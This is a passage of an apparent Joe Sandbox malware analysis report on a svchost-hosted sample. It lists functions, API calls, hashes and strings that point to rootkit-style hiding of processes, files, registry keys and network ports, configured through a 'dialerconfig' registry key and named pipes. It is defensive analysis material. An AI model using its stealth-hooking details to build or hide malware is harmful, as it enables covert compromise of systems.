                                                            • Part of subcall function 00000282B8DA1628: GetProcessHeap.KERNEL32 ref: 00000282B8DA1633
                                                            • Part of subcall function 00000282B8DA1628: HeapAlloc.KERNEL32 ref: 00000282B8DA1642
                                                            • Part of subcall function 00000282B8DA1628: RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA16B2
                                                            • Part of subcall function 00000282B8DA1628: RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA16DF
                                                            • Part of subcall function 00000282B8DA1628: RegCloseKey.ADVAPI32 ref: 00000282B8DA16F9
                                                            • Part of subcall function 00000282B8DA1628: RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA1719
                                                            • Part of subcall function 00000282B8DA1628: RegCloseKey.ADVAPI32 ref: 00000282B8DA1734
                                                            • Part of subcall function 00000282B8DA1628: RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA1754
                                                            • Part of subcall function 00000282B8DA1628: RegCloseKey.ADVAPI32 ref: 00000282B8DA176F
                                                            • Part of subcall function 00000282B8DA1628: RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA178F
                                                            • Part of subcall function 00000282B8DA1628: RegCloseKey.ADVAPI32 ref: 00000282B8DA17AA
                                                            • Part of subcall function 00000282B8DA1628: RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA17CA
                                                          • Sleep.KERNEL32 ref: 00000282B8DA1AD7
                                                          • SleepEx.KERNELBASE ref: 00000282B8DA1ADD
                                                            • Part of subcall function 00000282B8DA1628: RegCloseKey.ADVAPI32 ref: 00000282B8DA17E5
                                                            • Part of subcall function 00000282B8DA1628: RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA1805
                                                            • Part of subcall function 00000282B8DA1628: RegCloseKey.ADVAPI32 ref: 00000282B8DA1820
                                                            • Part of subcall function 00000282B8DA1628: RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA1840
                                                            • Part of subcall function 00000282B8DA1628: RegCloseKey.ADVAPI32 ref: 00000282B8DA185B
                                                            • Part of subcall function 00000282B8DA1628: RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA187B
                                                            • Part of subcall function 00000282B8DA1628: RegCloseKey.ADVAPI32 ref: 00000282B8DA1896
                                                            • Part of subcall function 00000282B8DA1628: RegCloseKey.ADVAPI32 ref: 00000282B8DA18A0
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1534210851-0
                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                          • Instruction ID: 181ce9791cc2777c8701bca29887cf002c54e55a650da323585abb3ab7de6bc0
                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                          • Instruction Fuzzy Hash: E831F47920358BC2EF509736D6493A913A8A745BC8F24D4238F1F87A95FF30C4598311
                                                          Function 00000282B8DA3844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 58 282b8da3844-282b8da384f 59 282b8da3851-282b8da3864 StrCmpNIW 58->59 60 282b8da3869-282b8da3870 58->60 59->60 61 282b8da3866 59->61 61->60
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dialer
                                                          • API String ID: 0-3528709123
                                                          • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                          • Instruction ID: 2296dbed23345e0be7a5d67239bc82d2a6b340aa643fe212a8816904bc2d42b9
                                                          • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                          • Instruction Fuzzy Hash: A7D05E78313287CAFB589FB698CC7642351EB087D8FC88022CA1841A50DF38999D9710
                                                          Function 00000282B8D7273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2608769676.00000282B8D70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8D70000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8d70000_svchost.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                          • Instruction ID: 391ddc3b47ef0477f5c33c7caa8a0ec8728c814f64615d49fd5b2e146f7cd2ed
                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                          • Instruction Fuzzy Hash: 9061CF3AB036D2C7EB548F25940876973A2F754BE8F58C122DE5E07B88DB38D856C700

                                                          Non-executed Functions

                                                          Function 00000282B8DA2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 358 282b8da2b2c-282b8da2ba5 call 282b8dc2ce0 361 282b8da2bab-282b8da2bb1 358->361 362 282b8da2ee0-282b8da2f03 358->362 361->362 363 282b8da2bb7-282b8da2bba 361->363 363->362 364 282b8da2bc0-282b8da2bc3 363->364 364->362 365 282b8da2bc9-282b8da2bd9 GetModuleHandleA 364->365 366 282b8da2bed 365->366 367 282b8da2bdb-282b8da2beb GetProcAddress 365->367 368 282b8da2bf0-282b8da2c0e 366->368 367->368 368->362 370 282b8da2c14-282b8da2c33 StrCmpNIW 368->370 370->362 371 282b8da2c39-282b8da2c3d 370->371 371->362 372 282b8da2c43-282b8da2c4d 371->372 372->362 373 282b8da2c53-282b8da2c5a 372->373 373->362 374 282b8da2c60-282b8da2c73 373->374 375 282b8da2c75-282b8da2c81 374->375 376 282b8da2c83 374->376 377 282b8da2c86-282b8da2c8a 375->377 376->377 378 282b8da2c8c-282b8da2c98 377->378 379 282b8da2c9a 377->379 380 282b8da2c9d-282b8da2ca7 378->380 379->380 381 282b8da2d9d-282b8da2da1 380->381 382 282b8da2cad-282b8da2cb0 380->382 385 282b8da2ed2-282b8da2eda 381->385 386 282b8da2da7-282b8da2daa 381->386 383 282b8da2cc2-282b8da2ccc 382->383 384 282b8da2cb2-282b8da2cbf call 282b8da199c 382->384 388 282b8da2d00-282b8da2d0a 383->388 389 282b8da2cce-282b8da2cdb 383->389 384->383 385->362 385->374 390 282b8da2dac-282b8da2db8 call 282b8da199c 386->390 391 282b8da2dbb-282b8da2dc5 386->391 397 282b8da2d0c-282b8da2d19 388->397 398 282b8da2d3a-282b8da2d3d 388->398 389->388 396 282b8da2cdd-282b8da2cea 389->396 390->391 393 282b8da2df5-282b8da2df8 391->393 394 282b8da2dc7-282b8da2dd4 391->394 403 282b8da2dfa-282b8da2e03 call 282b8da1bbc 393->403 404 282b8da2e05-282b8da2e12 lstrlenW 393->404 394->393 402 282b8da2dd6-282b8da2de3 394->402 405 282b8da2ced-282b8da2cf3 396->405 397->398 406 282b8da2d1b-282b8da2d28 397->406 400 282b8da2d4b-282b8da2d58 lstrlenW 398->400 401 282b8da2d3f-282b8da2d49 call 282b8da1bbc 398->401 408 282b8da2d5a-282b8da2d64 400->408 409 282b8da2d7b-282b8da2d8d call 282b8da3844 400->409 401->400 412 282b8da2d93-282b8da2d98 401->412 410 282b8da2de6-282b8da2dec 402->410 403->404 420 282b8da2e4a-282b8da2e55 403->420 414 282b8da2e14-282b8da2e1e 404->414 415 282b8da2e35-282b8da2e3f call 282b8da3844 404->415 405->412 413 282b8da2cf9-282b8da2cfe 405->413 416 282b8da2d2b-282b8da2d31 406->416 408->409 419 282b8da2d66-282b8da2d79 call 282b8da152c 408->419 409->412 424 282b8da2e42-282b8da2e44 409->424 410->420 421 282b8da2dee-282b8da2df3 410->421 412->424 413->388 413->405 414->415 425 282b8da2e20-282b8da2e33 call 282b8da152c 414->425 415->424 416->412 426 282b8da2d33-282b8da2d38 416->426 419->409 419->412 428 282b8da2ecc-282b8da2ed0 420->428 429 282b8da2e57-282b8da2e5b 420->429 421->393 421->410 424->385 424->420 425->415 425->420 426->398 426->416 428->385 433 282b8da2e5d-282b8da2e61 429->433 434 282b8da2e63-282b8da2e7d call 282b8da85c0 429->434 433->434 437 282b8da2e80-282b8da2e83 433->437 434->437 440 282b8da2e85-282b8da2ea3 call 282b8da85c0 437->440 441 282b8da2ea6-282b8da2ea9 437->441 440->441 441->428 443 282b8da2eab-282b8da2ec9 call 282b8da85c0 441->443 443->428
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                          • Instruction ID: 101dd8816e601afc3e417be52c424690f2143971cea0334b30ee22e417e797f2
                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                          • Instruction Fuzzy Hash: 82B1883A213A93C2EB689F36D4487A963A5F744BD8F249027EE1D53F95DE35C988C340
                                                          Function 00000282B8DA7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                          • Instruction ID: 1995eebd5f917da244307f126f13dead4311d0d21103703894b6a870bdeb4a97
                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                          • Instruction Fuzzy Hash: 47310A76206AC1CAEB609F70E8547EE7364F784788F54842ADB9E57B94EF38C648C710
                                                          Function 00000282B8DAD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                          • Instruction ID: 7fbabc2a09341ce122fe51a6e3106ed8ccaed8fea8ffd292de93ed0c0fdf9cea
                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                          • Instruction Fuzzy Hash: E5313A3A216BC1C6EB608B35E84439E73A4F789798F644126EB9D43B98DF38C559CB00
                                                          Function 00000282B8DA1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 106492572-2879589442
                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                          • Instruction ID: 1950b28cea46380eea496e0e3801b89ed9579cf5cb0d414c00e313b0084afc08
                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                          • Instruction Fuzzy Hash: C571EA3A213A96C6EB109F76E898B593364F784BCCF109116DA5E57F69DF38C448C740
                                                          Function 00000282B8DA12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                          • Instruction ID: effbc4674bf8fef2694637ed199e3b40ad0493146be832eb150ab35de6a6efd1
                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                          • Instruction Fuzzy Hash: 4651483A202B89C6EB50CF76E44835AB7A5F789FD9F148126DA4A07B58DF38C049CB00
                                                          Function 00000282B8DA1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                          • API String ID: 4175298099-1975688563
                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                          • Instruction ID: 89bb572a076796c6a610c2841c98f0c181071193586b5c1550191b69f2ebd523
                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                          • Instruction Fuzzy Hash: 8331507D6039CBE0EE04EBBAE8697D46321B7443CCFA0D023D62E52D659E78864DC754
                                                          Function 00000282B8D76910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 202 282b8d76910-282b8d76916 203 282b8d76918-282b8d7691b 202->203 204 282b8d76951-282b8d7695b 202->204 206 282b8d76945-282b8d76984 call 282b8d76fc0 203->206 207 282b8d7691d-282b8d76920 203->207 205 282b8d76a78-282b8d76a8d 204->205 211 282b8d76a8f 205->211 212 282b8d76a9c-282b8d76ab6 call 282b8d76e54 205->212 224 282b8d76a52 206->224 225 282b8d7698a-282b8d7699f call 282b8d76e54 206->225 209 282b8d76938 __scrt_dllmain_crt_thread_attach 207->209 210 282b8d76922-282b8d76925 207->210 213 282b8d7693d-282b8d76944 209->213 215 282b8d76927-282b8d76930 210->215 216 282b8d76931-282b8d76936 call 282b8d76f04 210->216 217 282b8d76a91-282b8d76a9b 211->217 222 282b8d76ab8-282b8d76aed call 282b8d76f7c call 282b8d76e1c call 282b8d77318 call 282b8d77130 call 282b8d77154 call 282b8d76fac 212->222 223 282b8d76aef-282b8d76b20 call 282b8d77190 212->223 216->213 222->217 234 282b8d76b22-282b8d76b28 223->234 235 282b8d76b31-282b8d76b37 223->235 228 282b8d76a54-282b8d76a69 224->228 237 282b8d769a5-282b8d769b6 call 282b8d76ec4 225->237 238 282b8d76a6a-282b8d76a77 call 282b8d77190 225->238 234->235 239 282b8d76b2a-282b8d76b2c 234->239 240 282b8d76b39-282b8d76b43 235->240 241 282b8d76b7e-282b8d76b94 call 282b8d7268c 235->241 255 282b8d769b8-282b8d769dc call 282b8d772dc call 282b8d76e0c call 282b8d76e38 call 282b8d7ac0c 237->255 256 282b8d76a07-282b8d76a11 call 282b8d77130 237->256 238->205 245 282b8d76c1f-282b8d76c2c 239->245 246 282b8d76b45-282b8d76b4d 240->246 247 282b8d76b4f-282b8d76b5d call 282b8d85780 240->247 263 282b8d76b96-282b8d76b98 241->263 264 282b8d76bcc-282b8d76bce 241->264 252 282b8d76b63-282b8d76b78 call 282b8d76910 246->252 247->252 267 282b8d76c15-282b8d76c1d 247->267 252->241 252->267 255->256 305 282b8d769de-282b8d769e5 __scrt_dllmain_after_initialize_c 255->305 256->224 277 282b8d76a13-282b8d76a1f call 282b8d77180 256->277 263->264 272 282b8d76b9a-282b8d76bbc call 282b8d7268c call 282b8d76a78 263->272 265 282b8d76bd5-282b8d76bea call 282b8d76910 264->265 266 282b8d76bd0-282b8d76bd3 264->266 265->267 286 282b8d76bec-282b8d76bf6 265->286 266->265 266->267 267->245 272->264 298 282b8d76bbe-282b8d76bc6 call 282b8d85780 272->298 294 282b8d76a45-282b8d76a50 277->294 295 282b8d76a21-282b8d76a2b call 282b8d77098 277->295 291 282b8d76bf8-282b8d76bff 286->291 292 282b8d76c01-282b8d76c11 call 282b8d85780 286->292 291->267 292->267 294->228 295->294 304 282b8d76a2d-282b8d76a3b 295->304 298->264 304->294 305->256 306 282b8d769e7-282b8d76a04 call 282b8d7abc8 305->306 306->256
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2608769676.00000282B8D70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8D70000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8d70000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                          • API String ID: 190073905-1786718095
                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction ID: ec3e591a15a47e9088278830523254a6a2d00aff8877bb8944cee0359a68bdb0
                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction Fuzzy Hash: C681597D6036C3C6FA94AB76E84935967A0AB85BC8F54C4279A0D47E96FF38C84DC700
                                                          Function 00000282B8DACE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 309 282b8dace28-282b8dace4a call 282b8db6080 312 282b8dace4c-282b8dace57 FlsGetValue 309->312 313 282b8dace69-282b8dace74 FlsSetValue 309->313 314 282b8dace63 312->314 315 282b8dace59-282b8dace61 312->315 316 282b8dace7b-282b8dace80 313->316 317 282b8dace76-282b8dace79 313->317 314->313 318 282b8daced5-282b8dacee0 SetLastError 315->318 319 282b8dace85 call 282b8dad6cc 316->319 317->318 321 282b8dacef5-282b8dacf0b call 282b8dac748 318->321 322 282b8dacee2-282b8dacef4 318->322 320 282b8dace8a-282b8dace96 319->320 324 282b8dacea8-282b8daceb2 FlsSetValue 320->324 325 282b8dace98-282b8dace9f FlsSetValue 320->325 333 282b8dacf0d-282b8dacf18 FlsGetValue 321->333 334 282b8dacf28-282b8dacf33 FlsSetValue 321->334 328 282b8daceb4-282b8dacec4 FlsSetValue 324->328 329 282b8dacec6-282b8daced0 call 282b8dacb94 call 282b8dad744 324->329 327 282b8dacea1-282b8dacea6 call 282b8dad744 325->327 327->317 328->327 329->318 337 282b8dacf1a-282b8dacf1e 333->337 338 282b8dacf22 333->338 339 282b8dacf35-282b8dacf3a 334->339 340 282b8dacf98-282b8dacf9f call 282b8dac748 334->340 337->340 342 282b8dacf20 337->342 338->334 344 282b8dacf3f call 282b8dad6cc 339->344 345 282b8dacf8f-282b8dacf97 342->345 347 282b8dacf44-282b8dacf50 344->347 348 282b8dacf62-282b8dacf6c FlsSetValue 347->348 349 282b8dacf52-282b8dacf59 FlsSetValue 347->349 350 282b8dacf80-282b8dacf8a call 282b8dacb94 call 282b8dad744 348->350 351 282b8dacf6e-282b8dacf7e FlsSetValue 348->351 352 282b8dacf5b-282b8dacf60 call 282b8dad744 349->352 350->345 351->352 352->340
                                                          APIs
                                                          • GetLastError.KERNEL32 ref: 00000282B8DACE37
                                                          • FlsGetValue.KERNEL32(?,?,?,00000282B8DB0A6B,?,?,?,00000282B8DB045C,?,?,?,00000282B8DAC84F), ref: 00000282B8DACE4C
                                                          • FlsSetValue.KERNEL32(?,?,?,00000282B8DB0A6B,?,?,?,00000282B8DB045C,?,?,?,00000282B8DAC84F), ref: 00000282B8DACE6D
                                                          • FlsSetValue.KERNEL32(?,?,?,00000282B8DB0A6B,?,?,?,00000282B8DB045C,?,?,?,00000282B8DAC84F), ref: 00000282B8DACE9A
                                                          • FlsSetValue.KERNEL32(?,?,?,00000282B8DB0A6B,?,?,?,00000282B8DB045C,?,?,?,00000282B8DAC84F), ref: 00000282B8DACEAB
                                                          • FlsSetValue.KERNEL32(?,?,?,00000282B8DB0A6B,?,?,?,00000282B8DB045C,?,?,?,00000282B8DAC84F), ref: 00000282B8DACEBC
                                                          • SetLastError.KERNEL32 ref: 00000282B8DACED7
                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000282B8DB0A6B,?,?,?,00000282B8DB045C,?,?,?,00000282B8DAC84F), ref: 00000282B8DACF0D
                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000282B8DAECCC,?,?,?,?,00000282B8DABF9F,?,?,?,?,?,00000282B8DA7AB0), ref: 00000282B8DACF2C
                                                            • Part of subcall function 00000282B8DAD6CC: HeapAlloc.KERNEL32 ref: 00000282B8DAD721
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000282B8DB0A6B,?,?,?,00000282B8DB045C,?,?,?,00000282B8DAC84F), ref: 00000282B8DACF54
                                                            • Part of subcall function 00000282B8DAD744: HeapFree.KERNEL32 ref: 00000282B8DAD75A
                                                            • Part of subcall function 00000282B8DAD744: GetLastError.KERNEL32 ref: 00000282B8DAD764
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000282B8DB0A6B,?,?,?,00000282B8DB045C,?,?,?,00000282B8DAC84F), ref: 00000282B8DACF65
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000282B8DB0A6B,?,?,?,00000282B8DB045C,?,?,?,00000282B8DAC84F), ref: 00000282B8DACF76
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                          • String ID:
                                                          • API String ID: 570795689-0
                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                          • Instruction ID: 6331ffab39a99ffc91411753b8477b2163940aedd9578e6ac9642e9a9206d313
                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                          • Instruction Fuzzy Hash: D7414D7C2032C6C1FA68A775955E36923819B457FCF78C726AB3E46EE6DE38C5094700
                                                          Function 00000282B8DA2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                          • API String ID: 2171963597-1373409510
                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                          • Instruction ID: 7155f4c15d31a255bd87d95c5c2582963d6e4b11c15f4385a638476bda2f67e4
                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                          • Instruction Fuzzy Hash: 07213D3A616682C2EB109B35F44875963A0F789BE8F508216EB5D02EA8CF3CC549CB00
                                                          Function 00000282B8D79944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 456 282b8d79944-282b8d799ac call 282b8d7a814 459 282b8d79e13-282b8d79e1b call 282b8d7bb48 456->459 460 282b8d799b2-282b8d799b5 456->460 460->459 461 282b8d799bb-282b8d799c1 460->461 463 282b8d799c7-282b8d799cb 461->463 464 282b8d79a90-282b8d79aa2 461->464 463->464 468 282b8d799d1-282b8d799dc 463->468 466 282b8d79aa8-282b8d79aac 464->466 467 282b8d79d63-282b8d79d67 464->467 466->467 469 282b8d79ab2-282b8d79abd 466->469 471 282b8d79d69-282b8d79d70 467->471 472 282b8d79da0-282b8d79daa call 282b8d78a34 467->472 468->464 470 282b8d799e2-282b8d799e7 468->470 469->467 474 282b8d79ac3-282b8d79aca 469->474 470->464 475 282b8d799ed-282b8d799f7 call 282b8d78a34 470->475 471->459 476 282b8d79d76-282b8d79d9b call 282b8d79e1c 471->476 472->459 482 282b8d79dac-282b8d79dcb call 282b8d76d40 472->482 479 282b8d79c94-282b8d79ca0 474->479 480 282b8d79ad0-282b8d79b07 call 282b8d78e10 474->480 475->482 490 282b8d799fd-282b8d79a28 call 282b8d78a34 * 2 call 282b8d79124 475->490 476->472 479->472 483 282b8d79ca6-282b8d79caa 479->483 480->479 494 282b8d79b0d-282b8d79b15 480->494 487 282b8d79cac-282b8d79cb8 call 282b8d790e4 483->487 488 282b8d79cba-282b8d79cc2 483->488 487->488 501 282b8d79cdb-282b8d79ce3 487->501 488->472 493 282b8d79cc8-282b8d79cd5 call 282b8d78cb4 488->493 524 282b8d79a48-282b8d79a52 call 282b8d78a34 490->524 525 282b8d79a2a-282b8d79a2e 490->525 493->472 493->501 498 282b8d79b19-282b8d79b4b 494->498 503 282b8d79c87-282b8d79c8e 498->503 504 282b8d79b51-282b8d79b5c 498->504 505 282b8d79ce9-282b8d79ced 501->505 506 282b8d79df6-282b8d79e12 call 282b8d78a34 * 2 call 282b8d7baa8 501->506 503->479 503->498 504->503 507 282b8d79b62-282b8d79b7b 504->507 509 282b8d79d00 505->509 510 282b8d79cef-282b8d79cfe call 282b8d790e4 505->510 506->459 511 282b8d79c74-282b8d79c79 507->511 512 282b8d79b81-282b8d79bc6 call 282b8d790f8 * 2 507->512 520 282b8d79d03-282b8d79d0d call 282b8d7a8ac 509->520 510->520 516 282b8d79c84 511->516 537 282b8d79bc8-282b8d79bee call 282b8d790f8 call 282b8d7a038 512->537 538 282b8d79c04-282b8d79c0a 512->538 516->503 520->472 535 282b8d79d13-282b8d79d61 call 282b8d78d44 call 282b8d78f50 520->535 524->464 541 282b8d79a54-282b8d79a74 call 282b8d78a34 * 2 call 282b8d7a8ac 524->541 525->524 529 282b8d79a30-282b8d79a3b 525->529 529->524 534 282b8d79a3d-282b8d79a42 529->534 